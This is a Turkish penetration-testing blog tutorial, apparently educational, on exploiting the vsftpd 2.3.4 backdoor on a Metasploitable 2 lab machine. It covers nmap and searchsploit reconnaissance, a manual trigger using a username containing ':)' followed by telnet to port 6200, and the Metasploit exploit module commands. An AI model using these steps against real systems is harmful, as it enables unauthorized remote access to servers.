MSF vsftpd_234_backdoor İstismar Modülü ile Uygulama Zafiyetinin İstismar Edilerek Meterpreter Bağlantısının Elde Edilmesi

0
2078
views
Sızma testleri sırasında tespit edilen zafiyetlerin istismarı ile hedef sistemlerde bir takım yetkiler elde edilebilir. Bu yazıda, Metasploitable 2 üzerindeki vsftpd servisine ait zafiyet tespit edildikten sonra istismar edilecek ve kullanıcı hakları ile Meterpreter bağlantısı elde edilecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

IP adresi 100.100.200.7 olan Metasploitable 2, Nessus ile taratıldığında TCP 21. portta Vsftpd 2.3.4 uygulamasının hizmet verdiği görülmektedir. Bu sürümde VSFTPD indirme arşivine eklenen bir arka kapı bulumaktadır.

acquiring-meterpreter-shell-on-linux-by-using-msf-vsftpd-234-backdoor-exploit-module-01

 

Sürüm bilgisi nmap aracı ile de tespit edilebilirdi.

nmap -sV -Pn -n 100.100.200.7 -p 21 –open

acquiring-meterpreter-shell-on-linux-by-using-msf-vsftpd-234-backdoor-exploit-module-02

 

Vsftpd uygulamasının 2.3.4 sürüme ait zafiyet Nmap’in betikleri ile bulunabilir.

nmap 100.100.200.7 -p 21 –script vuln

acquiring-meterpreter-shell-on-linux-by-using-msf-vsftpd-234-backdoor-exploit-module-03

 

Bunun yanında “searchsploit” aracı ile “exploit-db” üzerinde arama da gerçekleştirilebilir.

searchsploit vsftpd

acquiring-meterpreter-shell-on-linux-by-using-msf-vsftpd-234-backdoor-exploit-module-04

 

VSFTPD 2.3.4 sürümünde bulunan zafiyet bir arka kapıdır. Eğer kullanıcı adı “:)” karakter çiftini içerirse, oturum açılabilmektedir. Örneğin kullanıcı adı “Merhaba:)” (veya “Mer:)haba”, “:)Merhaba”,…) parola da “Parola123” olarak denenirse oturum açılabilecektir. Ayrıca TCP/6200 portu arka kapı olarak açılacak ve kimlik doğrulaması olmadan oturum açılabilecektir.

USER Merhaba:)
PASSWORD Parola123

telnet 100.100.200.7 6200

 

Bunun yanında otomatik olarak bu zafiyeti istismar etmek için Metaplosploit Framework içerisindeki vsftpd_234_backdoor istismar modülü kullanılabilir.

search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
show options

acquiring-meterpreter-shell-on-linux-by-using-msf-vsftpd-234-backdoor-exploit-module-05

 

MSF modülüne hedef sistemin IP adresi verilerek istismar işlemi gerçekleştirilebilir. Bu modül ile hedef işletim sisteminin TCP/6200 portuna erişim sağlandığı görülebilir.

set RHOST 100.100.200.7
run

acquiring-meterpreter-shell-on-linux-by-using-msf-vsftpd-234-backdoor-exploit-module-06

 

Kaynak:

Exploiting VSFTPD v2.3.4 on Metasploitable 2

 

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.